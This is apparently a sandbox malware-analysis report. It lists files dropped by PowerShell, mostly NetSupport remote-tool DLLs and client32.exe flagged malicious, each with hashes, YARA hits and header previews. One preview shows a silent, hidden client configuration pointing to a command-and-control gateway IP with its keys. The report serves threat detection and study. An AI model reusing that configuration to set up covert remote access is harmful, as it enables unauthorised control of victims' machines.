                                          SHA-512:CA39BF9E2388A75CB252ADD0D5D3889A18CB629E933D2FB610A14F24D3AEB2BB5F646378D6AAC62B36D6FAF01849C76D32B7DFF53831BC8924AFEE84E23C6555
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\YV.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Ya.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Ya.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Ya............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............w.:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:51:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9883042089819365
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7836FF2B7ECC73AA3D2DCE669D19A19E
                                          SHA1:7C28E21F043C365633C21E78DD9385FE6B859962
                                          SHA-256:FF289321882685EF1BFDEA6F45636CCE4CD800DCED9B4843C91854EF0525BB39
                                          SHA-512:0D9EE528CE9BD8CF4417E245CE30B19DF54DB2A9147BA783B5250F0D11E21424C8BB152E9E4623C0F1F98D36D1A1CD508EC27537B2E0674440E29D6CB5365D00
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....`..Vj)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\YV.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Ya.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Ya.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Ya............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............w.:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:51:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9787064977553834
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8A5F46693BC328B09C09A0299CF09861
                                          SHA1:642B458BD9CEB16B89D3C0D6505CF8E19B6B5D78
                                          SHA-256:2C4A9DBB362DACDCFFC112166EE3C14953634F6DE405A3546BA3F3EE0A5D9C31
                                          SHA-512:592776D7567A9C566432E380BF28E513BB121E18CFF5E52CA20E652F95F48D850A09F5EB83113E09EC1CCCEC4FD46F6FF98406D9753C16E3AD4EF76042CD25D1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....@..Wj)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\YV.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Ya.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Ya.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Ya............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............w.:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:51:03 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):3.9845737474203915
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6190C0E0CDABA9351454B26ABF091C1A
                                          SHA1:74E95AFB80B170D82066D85788CD29B551EF9CEF
                                          SHA-256:C40D5D2547DEBD05BBB3EB7CE79EF8901896E56BBDA4AE9C61D88313FE325727
                                          SHA-512:8E19E8943F356D662D704A99718B972F3895D7CF6980CEC79DBE4DA07ABB8E266033D0B02749254FC99B86B8A89E7875DA9E8AAD2E4D2C3A34A76BFA4442B5D5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....s.Vj)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\YV.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Ya.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Ya.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Ya............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............w.:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):328056
                                          Entropy (8bit):6.754723001562745
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2D3B207C8A48148296156E5725426C7F
                                          SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                          SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                          SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLL, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):257
                                          Entropy (8bit):5.119720931145611
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                          SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                          SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                          SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:Generic INItialization configuration [Features]
                                          Category:dropped
                                          Size (bytes):6458
                                          Entropy (8bit):4.645519507940197
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:88B1DAB8F4FD1AE879685995C90BD902
                                          SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                          SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                          SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):18808
                                          Entropy (8bit):6.22028391196942
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A0B9388C5F18E27266A31F8C5765B263
                                          SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                          SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                          SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLL, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3735416
                                          Entropy (8bit):6.525042992590476
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:00587238D16012152C2E951A087F2CC9
                                          SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                          SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                          SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\PCICL32.DLL, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):396664
                                          Entropy (8bit):6.809064783360712
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EAB603D12705752E3D268D86DFF74ED4
                                          SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                          SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                          SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLL, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\TCCTL32.DLL, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:modified
                                          Size (bytes):120288
                                          Entropy (8bit):5.258428134726746
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EE75B57B9300AAB96530503BFAE8A2F2
                                          SHA1:98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07
                                          SHA-256:06A0A243811E9C4738A9D413597659CA8D07B00F640B74ADC9CB351C179B3268
                                          SHA-512:660259BB0FD317C7FB76505DA8CBC477E146615FEC10E02779CD4F527AEB00CAED833AF72F90B128BB62F10326209125E809712D9ACB41017E503126E5F85673
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.g.W.g.W.g.^...U.g.8...T.g.W.f.R.g.8..V.g.8...V.g.8...V.g.RichW.g.........PE..L...1.oe.....................r...... ........ ....@..................................b....@.................................< ..<....0..Hm...........x...].......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc...Hm...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):647
                                          Entropy (8bit):5.603856649376801
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8C978A6D8F380D59C9DB4AFE06218B89
                                          SHA1:1FA286E91C8AA0EEB99276AF72D40E02D2148C51
                                          SHA-256:D8C2B28FF9F90626F7E669B4FBDB45ED553A3CB1A980E23FDFEA4FBBDDDFC502
                                          SHA-512:B74539AE7FC88756C1E1404814D33197CD8709AADDF2C43167F2CF157E947C2CABAD759414038DBE5E83B201786052E94AB53BD97BB4DE68744F514F8AE7F552
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:0xe755af83....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableCloseApps=0..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=92.255.85.135:443..gsk=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..gskmode=0..GSK=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..GSKX=GL:M@AEOHD<K?ACIGO:B=H@JBOGE..
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):773968
                                          Entropy (8bit):6.901559811406837
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0E37FBFA79D349D672456923EC5FBBE3
                                          SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                          SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                          SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:Windows setup INFormation
                                          Category:dropped
                                          Size (bytes):328
                                          Entropy (8bit):4.93007757242403
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:26E28C01461F7E65C402BDF09923D435
                                          SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                          SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                          SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):33144
                                          Entropy (8bit):6.737780491933496
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DCDE2248D19C778A41AA165866DD52D0
                                          SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                          SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                          SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dll, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dll, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dll, Author: Joe Security
                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dll, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):77280
                                          Entropy (8bit):6.793716898125355
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1768C9971CEA4CC10C7DD45A5F8F022A
                                          SHA1:3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7
                                          SHA-256:6558B3307215C4B73FC96DC552213427FB9B28C0CB282FE6C38324F1E68E87D6
                                          SHA-512:F83BF23ABCE316CB1B91A0AC89C1A709A58A7EC49C8493140AD7DC7A629E8F75032057889E42BE3091CF351760348380634F660C47A3897F69E398849CA46780
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...T.oe.....................J.......!............@.......................... ......Q.....@....................................<.......8................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...8...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                          Category:downloaded
                                          Size (bytes):52648
                                          Entropy (8bit):7.996033428788516
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:657E828FB3A5963706E24CBF9D711BB8
                                          SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                          SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                          SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
